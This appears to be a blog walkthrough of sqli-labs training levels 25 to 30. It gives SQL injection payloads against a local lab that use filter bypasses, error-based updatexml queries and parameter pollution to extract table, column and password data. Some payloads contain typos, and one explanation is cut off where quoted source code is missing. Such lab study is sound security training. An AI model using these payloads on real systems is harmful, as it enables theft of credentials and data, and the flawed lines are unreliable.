首页 > 数据库 >sqli-labs-master 25-30关

sqli-labs-master 25-30关

时间:2024-08-07 20:53:35浏览次数:13  
标签:group name 30 labs sqli table id concat schema

sqli-labs第25关

由本题意可得过滤and和or,我用双写进行绕过,例如:infoorrmation,aandnd

数据库名

http://127.0.0.1/sqli-labs-master/Less-25/?id=-1%27%20union%20select%201,2,database()--+

表名

127.0.0.1/sqli-labs-master/Less-25/?id=-1' union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_scchema=database() --+

sqli-labs第25a关

与25题相似,将’去掉就行,因为它是数字型注入

直接爆数据

http://127.0.0.1/sqli-labs-master/Less-25a/?id=-1%20union%20select%201,2,group_concat(table_name)%20from%20infoorrmation_schema.tables%20where%20table_schema=database()%20--+

sqli-labs第26关

过滤字符:逻辑运算符,注释符,空格

我们需要用单引号进行绕过,双写绕过逻辑运算符(and,or)或用&&和||替换

对于绕过空格,%09之类的不能绕过,可能因为apache解析的原因,所以只能使用()绕过

因此我们使用空格最少的报错注入最为合适

爆数据库表

?id=1'||(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema='security'))),1))||'0

爆字段名

?id=1'||(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_schema='security'aandnd(table_name='users')))),1))||'0 

爆数据

?id=1'||(updatexml(1,concat(0x7e,(select(group_concat(passwoorrd,username))from(users))),1))||'0 

sqli-labs第26a关

爆数据库名

?id=1' aandnd(substr(database(),1,1)='0')anandd'1'='1

sqli-labs第27关

本关依旧过滤了空格,但没有过滤运算符,题目提示过滤了SELECT和UNION,我们可以通过双写或大小写来进行绕过,因为过滤了空格,所以本题依旧使用报错注入

爆数据库表

?id=1'||(updatexml(1,concat(0x7e,(SeLecT(group_concat(table_name))from(information_schema.tables)where(table_schema='security'))),1))||'0

爆字段名

?id=1'||(updatexml(1,concat(0x7e,(SeLecT(group_concat(column_name))from(information_schema.columns)where(table_schema='security'and(table_name='users')))),1))||'0 

爆数据

?id=1'||(updatexml(1,concat(0x7e,(SelEct(group_concat(password,username))from(users))),1))||'0 

sqli-labs第27a关

页面无明显报错回显,且过滤了空格,我们尝试使用联合查询

爆列名

?id=0"uniunionon%0AseleSelectct%0A1,2,group_concat(column_name)from%0Ainformation_schema.columns%0Awhere%0Atable_schema='security'%0Aand%0Atable_name='users'%0Aand"1

爆数据

?id=0"uniunionon%0AseleSelectct%0A1,2,group_concat(password,id,username)from%0Ausers%0Awhere%0Aid=3%0Aand"1

sqli-labs第28关

根据本题提示,页面回显分析得到,本题过滤了空格,union,select,且空格被多次过滤

我们在再去看看是如何过滤union和select的,直接看源码吧

示空格,+表示匹配一次或多次,/i表示不区分大小写,所以整体表示匹配 union加一个或多个空格加select,其中union和select不区分大小。所以我们可以使用重写绕过写。

爆表名

?id=0')uni union%0Aselecton%0Aselect%0A1,2,group_concat(table_name)from%0Ainformation_schema.tables%0Awhere%0Atable_schema='security'and ('1

爆列名

 ?id=0')uni union%0Aselecton%0Aselect%0A1,2,group_concat(column_name)from%0Ainformation_schema.columns%0Awhere%0Atable_schema='security'%0Aand%0Atable_name='users'%0Aand('1

爆数据

?id=0')uni union%0Aselecton%0Aselect%0A1,2,group_concat(password,username)from%0Ausers%0Aand%0A('1

sqli-labs-master28a

发现此关没有过滤其他只过滤了union和select和+,#

爆表名

?id=0')uniunion selecton select 1,2,group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users'--+

sqli-labs-master29

二十九关就是会对输入的参数进行校验是否为数字,但是在对参数值进行校验之前的提取时候只提取了第一个id值,如果我们有两个id参数,第一个id参数正常数字,第二个id参数进行sql注入。sql语句在接受相同参数时候接受的是后面的参数值。

爆表名

?id=1&id=-2%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+

爆字段名

?id=1&id=-2%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=database() and table_name='users'--+

爆数据

?id=1&id=-2%27%20union%20select%201,group_concat(password,username),3%20from%20users--+

sqli-labs-master30

与29关相似,将单引号换成双引号即可

爆表名

?id=1&id=-2"%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+

爆列名

?id=1&id=-2"%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=database() and table_name='users'--+

爆数据

?id=1&id=-2"%20union%20select%201,group_concat(password,username),3%20from%20users--+

标签:group,name,30,labs,sqli,table,id,concat,schema
From: https://blog.csdn.net/a666666688/article/details/141001028

相关文章

  • CF305E Playing with String
    难点在于读题发现\(l\)总取\(1\)即可,然后稍加转换就变成个傻逼题了有个显而易见的\(O(n^3)\)的区间DP做法,即考虑记录每个区间的SG函数值,然后枚举分界点转移但仔细思考我们会发现能进行操作的只有初始时\(s_{i-1}=s_{i+1}\)的位置,并不会经过某些操作后使得一个本来不......
  • 30% 代码由 AI 生成,单测准确率达到 90%,我在阿里巴巴国际站推广通义灵码
    我叫狄建业,花名薛岳,2014年2月加入阿里。我在阿里的工作经历主要分成几个阶段,第一阶段是2014年到2017年左右,一直在1688服务上做研发。第二阶段是2018年后加入ICBU(阿里巴巴国际站),前期在做订购、CRM相关的工作。这两年我主要是负责商家整体的架构以及AI的探索与创新。......
  • 30% 代码由 AI 生成,单测准确率达到 90%,我在阿里巴巴国际站推广通义灵码
    我叫狄建业,花名薛岳,2014年2月加入阿里。我在阿里的工作经历主要分成几个阶段,第一阶段是2014年到2017年左右,一直在1688服务上做研发。第二阶段是2018年后加入ICBU(阿里巴巴国际站),前期在做订购、CRM相关的工作。这两年我主要是负责商家整体的架构以及AI的探索与创新。......
  • 【C/C++】 现有n个正整款,n<10000,要求出这n个正整数中的第k个最小整数(相同大小的整数
    现有n个正整款,n<10000,要求出这n个正整数中的第k个最小整数(相同大小的整数只计算一次)k≤1000,正整数均小于30000.第一行输入n和k,第二行输入有n个正整数的数组(有重复的数字)#include<iostream>#include<algorithm>usingnamespacestd;intmain(){intn=0,k=0;......
  • 泗博MODBUS TCP转PROFINET网关EPN-330实现焊机与西门子PLC的连接
    随着工业自动化水平的不断提高,各种设备之间的互联互通变得至关重要。然而,由于不同设备可能采用不同的通信协议,如何实现它们之间的无缝连接,成为了许多工程师和企业面临的难题。今天,我们就来分享一个上海泗博成功的案例,看看如何通过泗博自动化的MODBUSTCP转PROFINET网关EPN-330,实现......
  • 感恩回馈粉丝福利,AI大模型100+300学习视频&PDF,白嫖的机会来了!
    近两个月以来内收获了许多粉丝,在此非常感谢,筹划好几天准备了对大家有帮助和提升的相关资源,因为许多限制,但为了感谢大家对我认可和支持,,感谢每一个支持的我的粉丝,起码的见面礼还是得有的,后面有白嫖的方式。作为一名热心肠的互联网老兵,我决定把宝贵的AI知识分享给大家。至于......
  • 【BUUCTF】BabySQli
    【BUUCTF】BabySQli题目来源收录于:BUUCTFGXYCTF2019题目描述纯粹的SQL注入题随意传入name=abc&pw=a返回wronguser尝试传入name=1%27&pw=a发现闭合方式为',同时给出了一个可疑字符串把这段字符串丢进ChatGPT,告诉我们可能是Base32编码的,对其进行Base32解码得到......
  • python SQLite 访问组件
    importosimportsqlite3fromsqlite3importErrorfromqueueimportQueue,EmptyfromtypingimportList,Tuple,AnyclassSQLiteDB:default_db_path=os.path.dirname(os.path.dirname(os.path.abspath(__file__)))default_db_file=default_db_path......
  • kubernetes二进制安装 -- 1.30.3
    1、节点规划10.202.99.34master0110.202.99.35master0210.202.99.36master0310.202.99.37node0110.202.99.100vip2、环境准备2.1、关闭防火墙、selinux、swap和NetworkManager#关闭selinux##临时关闭setenforce0##永久关闭sed-i's/enforcing/disabl......
  • CVE-2023-7130漏洞靶场复现
    CollegeNotesGallery2.0允许通过“/notes/login.php”中的参数‘user’进行SQL注入。利用这个问题可能会使攻击者有机会破坏应用程序,访问或修改数据.抓登录包放sqlmap爆破直接--dump一把梭哈......